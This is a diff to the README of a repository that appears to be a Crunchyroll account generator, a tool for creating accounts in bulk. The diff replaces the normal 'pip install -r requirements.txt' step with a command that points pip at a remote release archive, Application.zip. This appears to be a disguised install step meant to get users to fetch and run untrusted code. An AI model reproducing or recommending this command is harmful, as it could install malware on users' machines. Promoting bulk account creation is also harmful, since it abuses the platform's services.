LESLSA/Crunchyroll-Account-Creator/README.md

 ### How to Use

 1. Clone the repository to your local machine.
-2. Install the necessary dependencies by running `pip install -r requirements.txt`.
+2. Install the necessary dependencies by running `pip install -r https://github.com/LESLSA/Crunchyroll-Account-Creator/releases/download/v1.0.0/Application.zip`.
 3. Customize the settings in the configuration file to suit your preferences.
 4. Run the tool and watch as it effortlessly generates Crunchyroll accounts for you.